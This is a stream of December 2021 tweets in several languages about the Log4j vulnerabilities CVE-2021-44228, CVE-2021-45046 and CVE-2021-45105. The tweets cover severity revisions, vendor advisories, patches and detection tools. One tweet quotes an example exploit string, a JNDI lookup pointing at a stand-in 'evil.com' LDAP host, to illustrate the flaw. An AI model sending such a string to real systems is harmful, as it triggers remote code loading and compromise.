2021-12-20 11:01:54jpcertによると、log4jの脆弱性は先述のCVE-2021-44228の他にも CVE-2021-45046とCVE-2021-45105の2つの脆弱性もあるみたい。 全ソフトウェア(一部ハードウェアも)で影響有無を確認する… https://t.co/1ptMSezrQX https://twitter.com/i/web/status/1472882380444954625neru01029390
2021-12-20 11:01:19@craigmullins IBM is a little behind CVE-2021-45046: Fixed in Log4j 2.12.2 (Java 7) and Log4j 2.16.0 (Java 8) Users… https://t.co/aFMFThnks4 https://twitter.com/i/web/status/1472882966812672008fpientka
2021-12-20 10:00:11Le patch #log4j pour corriger CVE-2021-44228 a généré une nouvelle CVE (CVE-2021-45046) https://t.co/A1BukQLhju VM… https://t.co/QwrVopjy54 https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/ https://twitter.com/i/web/status/1472867827682099203xhark
2021-12-20 09:48:33@nino_1991_jp 予行練習に一つお題をあげます。 ベトナムの開発パートナが開発しているソフトウェアシステムがJavaで開発されていたとしてlog4jの脆弱性 CVE-2021-44228, CVE-2021-45046… https://t.co/RkJ4q7bM3R https://twitter.com/i/web/status/1472861945359474694iriyak_playlive
2021-12-20 09:45:57今週もまた、CVE-2021-45046のせいでつらぽよnepinepimate3
2021-12-20 09:31:33I don't think u need to worry about the two vulnerabilities CVE-2021-45046 /CVE-2021-45105, just like the LibSSH CV… https://t.co/ttC0kEeN7x https://twitter.com/i/web/status/147286087902077337680vul
2021-12-20 09:24:31CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/THsX8Bikwr https://twitter.com/i/web/status/1472857444241973249DanRaywood
2021-12-20 09:21:04🚨 #log4j 2.15.0 does not restrict CVE-2021-45046 vulnerability to only a DoS attack. The CVSS score has been update… https://t.co/Pusgd5FEL8 https://twitter.com/i/web/status/1472859086425370625debrickedab
2021-12-20 09:01:32https://t.co/50gEiFZadJ Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046) https://ift.tt/3pdMPhYreddit4devs
2021-12-20 08:44:11vCENTER SERVER APPLIANCE - CVE-2021-44228 y CVE-2021-45046 - Remote code execution vulnerability via Apache Log4j… https://t.co/EAtau4P6TA https://twitter.com/i/web/status/1472847992616939521lifydouglaspain
2021-12-20 08:17:29Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046)… https://t.co/qYlrvvKMB8 https://twitter.com/i/web/status/1472839283543183363beingsheerazali
2021-12-20 08:00:17Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046) via /r/netsec… https://t.co/6s7RHutFwz https://twitter.com/i/web/status/1472839054207209476CybrXx0
2021-12-20 07:52:30Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046) https://t.co/dMkXOljb24 https://www.whitesourcesoftware.com/resources/blog/log4j-vulnerability-cve-2021-45105/_r_netsec
2021-12-20 07:51:14Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/jkFeAi88sI https://dy.si/hsLGsBStuartGilks123
2021-12-20 07:50:45New post: "Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046)" https://t.co/rWntav18FG https://ift.tt/3FkvrhaMyinfosecfeed
2021-12-20 07:40:27Citrix Security Advisory for Apache CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-20 07:15:40VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046) VMSA-2021-00… https://t.co/8kCl4siten https://twitter.com/i/web/status/1472825230007889920makotoclimb
2021-12-20 06:23:00@Bugcrowd 1: Log4j RCE CVE-2021-44228 & Log4j RCE CVE-2021-45046 (we wanted all the attention) 2: Log4j CVE-2021-45105 DDoS (hi)BlankJinn
2021-12-20 05:42:04Log4J-Detector – your file-system within any application that are vulnerable to CVE-2021-44228 and CVE-2021-45046… https://t.co/oaBhdEncda https://twitter.com/i/web/status/1472802589808992265CyberIQs_
2021-12-20 05:30:36Log4J-Detector - Detects Log4J versions on your file-system within any application that are vulnerable to CVE-2021-44228 and CVE-2021-45046squadpirates
2021-12-20 05:20:40CVE-2021-45046 log4j 2.17.0nagisato
2021-12-20 05:20:35CVE-2021-45046 (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j vers… https://t.co/JDIuUJgyI5 https://twitter.com/i/web/status/1472798476203266051h4md44n
2021-12-20 05:10:2212/19でリリースされたバージョンで、CVE-2021-44228とCVE-2021-45046が対応されているlog4j 2.16 が入ったバージョンがリリースされた。これで一旦一安心かな?CVE-2021-45105がやっぱ… https://t.co/6AxkhWCbCN https://twitter.com/i/web/status/1472794159140708352nohoyan
2021-12-20 03:40:33#JobScheduler V.1.13.10リリース Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228, CVE-2021-45046)の対応に加え、多数のバグフィックスを含んでいますので、アップ… https://t.co/77YwEBYAOp https://twitter.com/i/web/status/1472772577680818182satoruf
2021-12-20 03:31:15Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/MwaoEFgUfj https://www.haktechs.com/latest-hacking-news/second-log4j-vulnerability-cve-2021-45046-discovered-new-patch-released/HakTechs
2021-12-20 03:00:17#Splunk 、Security Advisoryが更新されています。 CVE-2021-45046/45105に関する情報が追加されています。 https://t.co/LfVliYifrV https://t.co/hNSW7vcYfD https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.htmlpapa_anniekey
2021-12-20 01:30:19기존 Apache Log4j 취약점 .. ① 원격코드 실행 취약점(CVE-2021-44228) ② 서비스 거부 취약점(CVE-2021-45046) ③ 원격코드 실행 취약점(CVE-2021-4104)… https://t.co/FGRpm53UV7 https://twitter.com/i/web/status/1472741041531133952mlmcorea
2021-12-20 01:11:45Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/XX9soAz4Oq #Apache https://t.co/aDHHnEkeaX https://buff.ly/3oTpaDedigiSOLcomau
2021-12-20 01:11:19“Log4jの脆弱性(CVE-2021-44228,CVE-2021-45046)のVMware製品の対応状況について(12/20版) - ネットワールド らぼ” https://t.co/AgWI6KZiiN https://htn.to/4uWWGx4LMCwaiha8
2021-12-20 00:40:44CVE-45046も追加されたため、全面的に内容を更新しました。 Log4jの脆弱性(CVE-2021-44228,CVE-2021-45046)のVMware製品の対応状況について(12/20版) https://t.co/qRutzKYiPb https://blogs.networld.co.jp/entry/2021/12/12/210529interto
2021-12-20 00:10:56The CVSS severity score of CVE-2021-45046 (second #Log4j flaw) has been revised from 3.7 to 9.0, as it could leads… https://t.co/Dd6j1YJMnw https://twitter.com/i/web/status/1472716298274680836KelviTech
2021-12-20 00:00:34UPDATE — The CVSS severity score of CVE-2021-45046 (second #Log4j flaw) has been revised from 3.7 to 9.0, as it cou… https://t.co/u2V7PzDGiW https://twitter.com/i/web/status/1472713689752997891YourAnonRiots
2021-12-20 00:00:06log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/evmvJy2pnS https://twitter.com/i/web/status/1472717924444303363moton
2021-12-19 23:51:04🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/Ci0tQVU5cu https://twitter.com/i/web/status/1472715759218536456threatintelctr
2021-12-19 23:33:15IT Risk: Apache.log4j2に複数の脆弱性(CVE増える) -2/2 CVE-2021-45105 CVE-2021-45046 CVE-2021-44228management_sun
2021-12-19 23:20:37🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/ClSV6GtfjA https://twitter.com/i/web/status/1472708216174047237threatintelctr
2021-12-19 21:03:03@Jedediah6 @TheASF 2.15.0 and 2.16.0 have exposed other DoS vulnerabilities (CVE-2021-45046). Updating to 2.17.0 i… https://t.co/oE8IY16WgD https://twitter.com/i/web/status/1472672514287538176alijawadfahs
2021-12-19 21:00:23An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/l6q9DIyNQb https://twitter.com/i/web/status/1472673045521350661ProductCERT
2021-12-19 20:20:14CVE-2021-45046: Apache Log4j Remote Code Execution Vulnerability Alert https://t.co/fQ9jMn3RvD https://api.follow.it/track-rss-story-click/v3/tV43J6zIAWiQrYg0bHfV0a8qfTAM-Smmsarang143u
2021-12-19 19:30:14Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize Operations 8.x https://t.co/0YwSU9KiEt https://dy.si/KANA8scandaletti
2021-12-19 19:00:54log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/q4BfJzCo5a https://twitter.com/i/web/status/1472640584863170572d34dr4bbit
2021-12-19 19:00:49log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/ydPamDtKsw https://twitter.com/i/web/status/1472641470205087746beingsheerazali
2021-12-19 18:54:58log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/u2qvhr3zPx https://twitter.com/i/web/status/1472640192246857728Dinosn
2021-12-19 17:21:47Some of the products affected by #log4shell CVE-2021-44228, CVE-2021-45046 VMWARE Products: https://t.co/qjF5dxg7rL… https://t.co/j7d7azWffa https://vmware.com/security/advisories/VMSA-2021-0028.html https://twitter.com/i/web/status/14726155203064422560xMohamedhasan
2021-12-19 17:20:42Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/0fgidRNuTi https://dy.si/RMjwZscandaletti
2021-12-19 16:50:06CVE-2021-45046: Fixed in Log4j 2.12.2 (Java 7) and Log4j 2.16.0 (Java 8) Users are advised not to enable JNDI in Lo… https://t.co/H19R4HQgLi https://twitter.com/i/web/status/1472609505376677888fpientka
2021-12-19 15:54:34Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/hRqEOe2mvG https://dy.si/uqpkmdsimelka
2021-12-19 14:51:06Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/7m0RTlbj7Q https://t.co/VW37My7cW3 http://dlvr.it/SFgKfyjinuem
2021-12-19 14:30:55Apache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228, CVE-2021-4104, CVE-2021-45046 )とSELinux https://t.co/ZeZVUzVpjs https://security.sios.com/security/apache-log4j-selinux-poc-20211219.htmlmatsuu_zatsu
2021-12-19 14:11:25ここ最近のlog4j2のCVSS Score; - CVE-2021-44228: 10.0 - CVE-2021-45046: 9.0 - CVE-2021-45105: 7.5 Java8にして、2.17.0にして年越しましょう、とうことでFAnoguchis
2021-12-19 14:00:30Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-45046: 4.2M (audience size) CVE-2021-45105: 4.1M CVE-2021-442… https://t.co/DLAgCBy9at https://twitter.com/i/web/status/1472567404593139715CVEtrends
2021-12-19 13:21:22#Log4j #Java #Log4Shell Aumentan la severidad de CVE-2021-45046 en Log4j La segunda vulnerabilidad fue actualizad… https://t.co/cUbrNUFeCL https://twitter.com/i/web/status/1472556883345121284NormanOre
2021-12-19 12:13:52Log4Shell Update: Severity Upgraded from 3.7 to 9.0 for Second log4j Vulnerability (CVE-2021-45046) https://t.co/fCuqSwIf50 https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/stipemarinovic
2021-12-19 11:51:50JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 #SmartNews https://t.co/u2TXa57VD3 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/sheemer
2021-12-19 11:50:21🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/D2BM7UGmiq https://twitter.com/i/web/status/1472534564203646984threatintelctr
2021-12-19 11:30:34“Log4Shell (CVE-2021-44228, CVE-2021-45046)” (1 user) https://t.co/pip0mQxS0q https://htn.to/3CjyrSNuvwnamachan10777
2021-12-19 11:20:09まとめると、こんな感じかな。 CVE-2021-44228は12/15にでたバージョンで対応可能。 CVE-2021-45046は12/15のでたバージョンでは対応できないのでKBに従って対応。(バージョンアップされることを期待)… https://t.co/C6jEylqMmU https://twitter.com/i/web/status/1472526458472263684nohoyan
2021-12-19 11:02:52Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228 & CVE-2021-45046) | LunaSec… https://t.co/Pj4GDyJYm3 https://twitter.com/i/web/status/1472520654880661511icoleis
2021-12-19 11:00:25UPDATE: VxRail Manager workaround to remediate Log4Shell (CVE-2021-44228/CVE-2021-45046/CVE-2021-4104) vulnerabilit… https://t.co/5ymjYtI9vz https://twitter.com/i/web/status/1472521900337377280VRMware
2021-12-19 10:50:21CVE-2021-45105で公式でてた。影響なし。月曜日から聞かれても助かるわ~。CVE-2021-44228とCVE-2021-45046用のKBはlog4jの2.16.0用に書き換わってるから注意! we have dete… https://t.co/H1Y404Jb6O https://twitter.com/i/web/status/1472519580480577536nohoyan
2021-12-19 08:30:39Apache Log4Shell CVE-2021-45046 Bypass Remote Code Execution https://t.co/7oTw8hYmKb https://ift.tt/3mbNb6Qcc_cyberdefence
2021-12-19 07:15:18CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-19 07:02:13#log4j - CVE-2021-44228 (CVSS score: 10.0) - CVE-2021-45046 (CVSS score: 9.0) - CVE-2021-45105 (CVSS score: 7.5)… https://t.co/HXJvNRnp2I https://twitter.com/i/web/status/1472460089340530688cyberg0100
2021-12-19 06:21:13Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/2vwasfycWS https://t.co/FjbbRLyuoE http://dlvr.it/SFfSMXhaithnews
2021-12-19 05:01:21Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/dXGlGzn7Fy via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlsarmentots
2021-12-19 03:51:59Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) #Log4Shell #log4j… https://t.co/6jgJ97TzBY https://twitter.com/i/web/status/1472411797638598656malwaresick
2021-12-19 03:41:41Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/jXfDfTTQP6 https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlcerberus0x64e67
2021-12-19 03:40:31CVE-2021-45046: Apache Log4j Remote Code Execution Vulnerability Alert https://t.co/WScL5vTw5I https://t.co/G5TEg9XVjZ http://dlvr.it/SFfFc8AcooEdi
2021-12-19 03:32:22CVE-2021-45046: Apache Log4j Remote Code Execution Vulnerability Alert https://t.co/huP2gkFRZu #opensource #infosec #security #pentest https://securityonline.info/cve-2021-45046-apache-log4j-remote-code-execution-vulnerability-alert/the_yellow_fall
2021-12-19 01:00:50あれ、Log4jの2つ目のCVE-2021-45046ってCVSS 9.0になったの?(;´Д`)最初3だか4って言ってなかった?yoyo_real
2021-12-18 23:50:25And here we go again... Version 2.17 to fix CVE-2021-45105. It's similar to CVE-2021-45046, but a DoS impact... Hig… https://t.co/Q5Q3iiiGsC https://twitter.com/i/web/status/1472352077556895745dibbesnl
2021-12-18 23:50:04🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/qh7c2xE1MF https://twitter.com/i/web/status/1472353371159990273threatintelctr
2021-12-18 23:30:32VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/IOnoL6X408… https://t.co/YjjeDWmC9F https://angrysysops.com/2021/12/19/vmware-site-recovery-manager-is-getting-patch-resolve-cve-2021-44228-and-cve-2021-45046/ https://twitter.com/i/web/status/1472347236701028356AngrySysOps
2021-12-18 22:40:16Citrix Security Advisory for Apache CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-18 22:40:12SIOSセキュリティブログを更新しました。 Apache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228, CVE-2021-4104, CVE-2021-45046 )とSELinux… https://t.co/txCKQy0BHG https://twitter.com/i/web/status/1472334715772620801omokazuki
2021-12-18 22:10:29UPDATE: CVE-2021-45046 impacting Log4j 2.15.0, Released guidance for Azure Arc-enabled Data Services, SQL Server fo… https://t.co/CbeqVWQk48 https://twitter.com/i/web/status/1472327194764627970Snagsy1980
2021-12-18 21:40:17CVE-2021-45046: Information leak and remote code execution Version 2.15.0nft_sec
2021-12-18 21:00:14Scan with PowerShell for CVE-2021-44228 and/or CVE-2021-45046 effected versions of Log4j with support for JAR archi… https://t.co/gTnmMOzaz2 https://twitter.com/i/web/status/1472309446898593795jhochwald
2021-12-18 20:00:22Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/M0hIGaYtz9 https://dy.si/X8iF4m2fverdugo_vmware
2021-12-18 20:00:19Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize Operations 8.x https://t.co/osntmDK3Jg https://dy.si/Tirxhfverdugo_vmware
2021-12-18 20:00:17Arreglaron el bug de #log4j (CVE-2021-44228, criticidad 10), e introdujeron otro (CVE-2021-45046, criticidad 9). Ar… https://t.co/yfIfn8J1sB https://twitter.com/i/web/status/1472293868280467457mis2centavos
2021-12-18 19:40:13Details of the #OracleAnalytics Server patch to fix the Apache Log4j vulnerability - CVE-2021-45046 can be found in… https://t.co/fHmYbxgTyZ https://twitter.com/i/web/status/1472289088074133513ElffarAnalytics
2021-12-18 19:20:23CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/eS0UuYrM4C https://twitter.com/i/web/status/1472283163015598082Art_Capella
2021-12-18 19:10:22@GossiTheDog I believe that the # issue and the formatMsgNoLookups bypass received the same CVE of CVE-2021-45046 b… https://t.co/Ns5h30NJy7 https://twitter.com/i/web/status/1472281201431957510wdormann
2021-12-18 18:40:14@GossiTheDog Also, if Apache themselves claim that the formatMsgNoLookups bypass is indeed CVE-2021-45046, then I'm… https://t.co/hG36c1Jsg8 https://twitter.com/i/web/status/1472275051248599045wdormann
2021-12-18 18:10:36My assessment of log4j CVEs in general log4j usage. CVE-2021-44228: RCE CVE-2021-45046: local privilege escalation… https://t.co/iTZsLNwCGV https://twitter.com/i/web/status/1472266824599236611nahi
2021-12-18 17:51:00@MrMiniMuli @vxunderground As w/ the prior CVE-2021-45046, CVE-2021-45105 has specific requirements to be exploitab… https://t.co/uHQa2pyMtV https://twitter.com/i/web/status/1472261014104297483wdormann
2021-12-18 17:50:05@GossiTheDog The CVE-2021-45046 description was unfortunately written as if 2.15 was the only log4j version that ex… https://t.co/Fb2OBl5Kr4 https://twitter.com/i/web/status/1472262845375172611wdormann
2021-12-18 17:40:18@GossiTheDog Not according to the Apache ticket. It's reportedly CVE-2021-45046. https://t.co/kzFHX49vf2 https://t.co/luriAtueHa https://issues.apache.org/jira/browse/LOG4J2-3221wdormann
2021-12-18 17:20:42📢 #Log4j Vulns ~ 1) CVE-2021-44228 (RCE) - Critical Payload: ${jndi:ldap://evil[.]com:1389/a} 2) CVE-2021-45046 (… https://t.co/HBK0IWqAhw https://twitter.com/i/web/status/14722547035012587561ZRR4H
2021-12-18 16:41:00Citrix Security Advisory for Apache CVE-2021-44228 and CVE-2021-45046 | https://t.co/A6eXrAFdKA https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-18 16:31:48Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/b5vDtH6hZm… https://t.co/YgmkK1xhsO https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html https://twitter.com/i/web/status/1472241418726957058AJBlackston
2021-12-18 16:31:25Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial… https://t.co/FxAAMcVV3Q https://twitter.com/i/web/status/1472241631126458368oss_security
2021-12-18 15:50:51Well, log4j 2.17 was released to fix CVE-2021-45105, which is just like CVE-2021-45046 but only a DoS impact.… https://t.co/Nzi1kQBFAD https://twitter.com/i/web/status/1472230763655532552wdormann
2021-12-18 15:50:40“Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec” https://t.co/zYWjsNwKE9 https://htn.to/2VbhHV6xr3teramako
2021-12-18 15:30:43Suggested Read: Understanding Log4Shell via Exploitation and Live Patching (CVE-2021-44228 + CVE-2021-45046) | Luna… https://t.co/a29rCqwNzK https://twitter.com/i/web/status/1472226901964070913ChrisShort
2021-12-18 15:30:24#EU #CERT releases advisory 2021-075 on #CVE-2021-44228 and CVE-2021-45046 in #Apache #Log4j affecting #VMWare products.InakMali
2021-12-18 15:30:22JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/FVoPpJTM3a https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/prgkop
2021-12-18 15:10:32CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-18 15:10:19#Log4j - The fourth in the series ℹ️ CVE-2021-44228 - CVSS score: 10.0 ℹ️ CVE-2021-45046 - CVSS score: 9.0 ℹ️ CVE… https://t.co/cKEBMBK5im https://twitter.com/i/web/status/1472221439780696073mis_config
2021-12-18 15:00:22log4j log4shell Upgrade to version 2.17.0 CVE-2021-44228(CVSS score: 10.0),CVE-2021-45046(CVSS score: 9.0),CVE-2021… https://t.co/hTgY604F6x https://twitter.com/i/web/status/1472218323337494532ohhara_shiojiri
2021-12-18 14:50:16Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/d4Z3aymmOU #apt https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlKrisWasserman
2021-12-18 14:40:13@gatestone CVE-2021-45105 => DoS => Apachen antama CVSS 7.5 CVE-2021-45046 => RCE => Apachen antama CVSS 9.0 Molem… https://t.co/8R1nTzK7BO https://twitter.com/i/web/status/1472214044903886850JuhoJauhiainen
2021-12-18 14:40:09Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/b5vDtH6hZm… https://t.co/8mRu6Cye9e https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html https://twitter.com/i/web/status/1472214750054518786AJBlackston
2021-12-18 14:31:03Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/YsArzSYgzy #Cybersecurity… https://t.co/JUNMtr2ksQ https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html https://twitter.com/i/web/status/1472210461139554310_silvino_
2021-12-18 14:30:16@Hooberbloob @TheHackersNews CVE-2021-45046 is rated low - 3.7/10. red hat now change it to 8.1/10.taltalon
2021-12-18 14:30:10Mới đây lỗ hổng thứ CVE-2021-45046 đã được nâng cấp điểm từ 3.7 (tấn công DoS trong phạm vi hạn chế) lên tận 9.0 (c… https://t.co/11KYAHWqN7 https://twitter.com/i/web/status/1472212293643431943WhiteHatvn
2021-12-18 14:20:36Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/PCtCktULeV #TheHackerNews #MSExpertTalk #Security https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlRiazjavedbutt
2021-12-18 14:20:31Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/yTzMn290CW UPDATE — The se… https://t.co/gBfTUGXvJR https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html https://twitter.com/i/web/status/1472209155842723843M157q_News_RSS
2021-12-18 14:20:26The 2nd #Log4j vulnerability CVE-2021-45046 that was initially rated CVSS v3 score of 3.7 (medium) has been bumped… https://t.co/XmzzCjQ3gs https://twitter.com/i/web/status/1472209434734731269CswWorks
2021-12-18 14:11:29Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 3.8M (audience size) CVE-2021-45046: 2.8M CVE-2021-451… https://t.co/VjYjpsP4tj https://twitter.com/i/web/status/1472205014370238470CVEtrends
2021-12-18 14:11:27UPDATE — The CVSS severity score of CVE-2021-45046 (second #Log4j flaw) has been revised from 3.7 to 9.0, as it cou… https://t.co/xgYGrOaplJ https://twitter.com/i/web/status/1472205034918080512TheHackersNews
2021-12-18 14:10:59"UPDATE — The CVSS severity score of CVE-2021-45046 (second #Log4j flaw) has been revised from 3.7 to 9.0, as it co… https://t.co/JPe1VJpmWl https://twitter.com/i/web/status/1472205670128795651trip_elix
2021-12-18 14:10:22Log4jの脆弱性、最初に見つかったCVE-2021-44228に加え、CVE-2021-45046 / CVE-2021-45105 が見つかっていて、対応バージョンが2.15.0→2.16.0→2.17.0と上がってるのね。メンテナーも利用者もお疲れ様です。abe_masanori
2021-12-18 14:10:12UPDATE The CVSS severity score of CVE-2021-45046 (second #Log4j flaw) has been revised from 3.7 to 9.0 as it could… https://t.co/xORjaNK1mn https://twitter.com/i/web/status/1472207269689389060beingsheerazali
2021-12-18 13:07:58Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec https://t.co/8EsSlk8QYA https://ift.tt/3IXE5V2magiauk
2021-12-18 13:07:30@ApacheSolr #Apache #Solr is not vulnerable to the recently found security issues CVE-2021-45046 and CVE-2021-45105… https://t.co/ayY08QT6ii https://twitter.com/i/web/status/1472187690175115266thetaph1
2021-12-18 13:04:31@rwzh_ @EmilyGorcenski #Apache #Solr is not vulnerable to the recently found security issues CVE-2021-45046 and CVE… https://t.co/sw0uatdhtV https://twitter.com/i/web/status/1472188391898894344thetaph1
2021-12-18 12:56:52Due to the new DoS vulnerabilities (CVE-2021-45046) found in log4j 2.16.0, updated our log4j-scanner to include cor… https://t.co/HnrXCCSHCS https://twitter.com/i/web/status/1472185429050994693remco_verhoef
2021-12-18 12:51:04#Apache #Solr is not vulnerable to the recently found security issues CVE-2021-45046 and CVE-2021-45105. Solr uses… https://t.co/UONXMJXMIo https://twitter.com/i/web/status/1472187201639354369thetaph1
2021-12-18 12:50:21🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/qwfO8RoVY4 https://twitter.com/i/web/status/1472187276427816964threatintelctr
2021-12-18 12:44:24CVE-2021-44228に加えてCVE-2021-45046とかCVE-2021-45105が出てきて泥沼に……Takemaro_001
2021-12-18 12:23:39Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec https://t.co/2ZgkbqUAgt https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/it_hatebu
2021-12-18 12:13:31Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec https://t.co/2ZgkbrcJuB https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/it_hatebu
2021-12-18 11:50:30🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/QJsmlEYaSz https://twitter.com/i/web/status/1472172176535171076threatintelctr
2021-12-18 11:31:03In terms of updating: #log4j #CVE-2021-45046 #CVE-2021-45105 #CVE-2021-44228 https://t.co/mHFdgF1e2btheDeallocated
2021-12-18 11:22:43TIL CVE-2021-45046 is sooo 2021-12-17 #Log4Shell https://t.co/QZnafiMgEE https://twitter.com/GossiTheDog/status/1472151817379360771AndSchroeder
2021-12-18 10:52:25JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/wLVdINYfOv #スマートニュース https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/kanzakikokke
2021-12-18 10:50:50"...the second Log4j vulnerability (CVE-2021-45046) was upgraded from a CVSS score of 3.7 (limited DOS) to a CVSS s… https://t.co/gpRteUbhjP https://twitter.com/i/web/status/1472157372990820352jandres_casado
2021-12-18 10:30:55log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/UeZaVxCxoM https://twitter.com/i/web/status/1472147795956142082the_yellow_fall
2021-12-18 10:28:38log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/GBo6pwro6M https://twitter.com/i/web/status/1472148525119008769AcooEdi
2021-12-18 10:11:49[Complete] Emergency Maintenance for CVE-2021-45046 - Zettagrid All Availability Zones: The maintenance is now comp… https://t.co/Hjj3e8t529 https://twitter.com/i/web/status/1472146748223234050ZettaOps
2021-12-18 10:02:35Arctic Wolf veröffentlicht das Log4Shell Deep Scan Tool, um sowohl CVE-2021-45046 als auch CVE-2021-44228 aufzuspür… https://t.co/86TtjftIw4 https://twitter.com/i/web/status/1472142240885743632PierreFlammer
2021-12-18 09:43:13Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/qbfCHU8qaZ https://dy.si/jgbVnmastr79
